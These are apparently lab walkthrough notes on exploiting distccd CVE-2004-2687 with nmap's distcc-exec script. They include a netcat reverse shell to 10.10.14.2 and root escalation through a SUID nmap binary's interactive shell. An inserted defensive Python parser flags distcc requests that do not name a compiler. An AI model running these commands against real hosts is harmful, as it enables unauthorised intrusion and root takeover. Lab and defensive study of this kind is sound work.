3632 distccd

https://nmap.org/nsedoc/scripts/distcc-cve2004-2687.html

$ nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='whoami;id'" -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-26 16:45 PDT
Nmap scan report for 10.10.10.3
Host is up (0.071s latency).

PORT     STATE SERVICE
3632/tcp open  distccd
| distcc-exec:
|   VULNERABLE:
|   distcc Daemon Command Execution
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2004-2687
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|       Allows executing of arbitrary commands on systems running distccd 3.1 and
|       earlier. The vulnerability is the consequence of weak service configuration.
|
|     Disclosure date: 2002-02-01
|     Extra information:
|
|     daemon
|     uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
|       https://distcc.github.io/security.html
|_      https://nvd.nist.gov/vuln/detail/CVE-2004-2687

Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
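What the script above exploits is that distccd runs whatever program the request's first ARGV token names, so a compile job and a command-execution attempt differ only in that argument. The following added example (not from this page or the distcc project) parses a distcc request and flags one whose argv[0] is not an allowlisted compiler, the check a network sensor or a wrapper in front of distccd would apply; the ALLOWED_COMPILERS set and the two sample requests are constructed assumptions.

```python
import re
from typing import List

# Assumption: a site allowlist of compilers distccd may legitimately run.
ALLOWED_COMPILERS = {"gcc", "g++", "cc", "c++", "clang", "clang++"}

# Every distcc token is a 4-byte ASCII name followed by an 8-digit hex value.
TOKEN_RE = re.compile(rb"([A-Z]{4})([0-9a-fA-F]{8})")

def parse_request(data: bytes) -> List[str]:
    """Return the argv list in a distcc request: DIST = version, ARGC = count,
    ARGV = length + bytes; DOTI (preprocessed source) ends what we inspect."""
    pos, argv, argc = 0, [], None
    while pos < len(data):
        m = TOKEN_RE.match(data, pos)
        if m is None:
            raise ValueError(f"bad token at offset {pos}")
        name, value = m.group(1), int(m.group(2), 16)
        pos = m.end()
        if name == b"DIST":
            continue
        if name == b"ARGC":
            argc = value
        elif name == b"ARGV":
            if pos + value > len(data):
                raise ValueError("ARGV length runs past end of request")
            argv.append(data[pos:pos + value].decode("utf-8", "replace"))
            pos += value
        elif name == b"DOTI":
            break
        else:
            raise ValueError(f"unknown token {name!r}")
    if argc is not None and argc != len(argv):
        raise ValueError(f"ARGC says {argc} but {len(argv)} ARGV tokens seen")
    return argv

def classify(argv: List[str]) -> str:
    """'benign' if argv[0] names an allowed compiler, else 'suspicious'."""
    if not argv:
        return "malformed"
    prog = argv[0].rsplit("/", 1)[-1]  # tolerate an absolute path like /usr/bin/gcc
    return "benign" if prog in ALLOWED_COMPILERS else "suspicious"

# Constructed sample requests (not captured traffic): a normal compile job and
# one whose first argument is a shell instead of a compiler.
BENIGN = (b"DIST00000001ARGC00000003ARGV00000003gccARGV00000002-c"
          b"ARGV00000006main.cDOTI00000000")
SUSPICIOUS = (b"DIST00000001ARGC00000003ARGV00000002shARGV00000002-c"
              b"ARGV00000002idDOTI00000000")
```

On the host side, starting distccd with its --allow netmask option and keeping 3632/tcp off any network other than the build network removes the exposure the script reports.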

$ nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='nc 10.10.14.2 6969 -e /bin/sh'" -Pn

whoami
daemon

find / -type f -user root \( -perm -4000 -o -perm -2000 \) 2>/dev/null -ls
344956  768 -rwsr-xr-x   1 root     root       780676 Apr  8  2008 /usr/bin/nmap

nmap --interactive
!sh

whoami;id
root
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)
